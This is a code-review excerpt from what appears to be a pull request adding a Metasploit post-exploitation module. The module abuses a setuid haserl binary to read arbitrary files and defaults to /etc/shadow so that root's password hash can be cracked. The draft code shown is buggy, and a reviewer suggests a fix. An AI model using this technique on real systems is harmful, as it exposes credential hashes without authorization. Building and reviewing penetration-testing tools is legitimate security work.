modules/post/linux/gather/haserl_read.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Haserl Arbitrary File Reader',
+        'Description' => %q{
+          This module exploits haserl to read arbitrary files.
+          The most widely accepted exploitation vector is reading /etc/shadow,
+          which will reveal root's hash for cracking.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Julien (jvoisin) Voisin', # metasploit module
+          'Ike Broflovski' # discovery
+        ],
+        'Platform' => [ 'linux' ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'References' => [
+          ['URL', 'https://twitter.com/steaIth/status/1364940271054712842'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('RFILE', [true, 'File to read', '/etc/shadow']),
+    ])
+  end
+
+  def get_binary
+    files = begin
+      get_suid_files('/usr/bin')
+    rescue StandardError
+      fail_with(Failure::UnexpectedReply, 'Could not list /usr/bin/ directory contents')
+    end
+
+    unless files
+      fail_with(Failure::UnexpectedReply, 'Could not retrieve /usr/bin/ directory contents')
+    end
+
+    path = files.select { |f| File.basename(f).starts_with?('haserl-lua') }.first
+
+    unless path
+      fail_with(Failure::NotVulnerable, 'Could not find setuid haserl lua executable in /usr/bin/')
+    end
+
+  end
+
+  def check
+    binary = get_binary
+    vprint_good("Found set-uid haserl: #{path}")
+
+    Exploit::CheckCode::Appears("#{binary} is present and setuid")
```

Comment:
If `get_binary` can return `nil`, this will need to handle it:
```suggestion
    if binary = get_binary
      print_good("Found set-uid haserl: #{path}")
      Exploit::CheckCode::Appears("#{binary} is present and setuid")
    else
      Exploit::CheckCode::Safe('haserl could not be found or is not setuid')
    end
```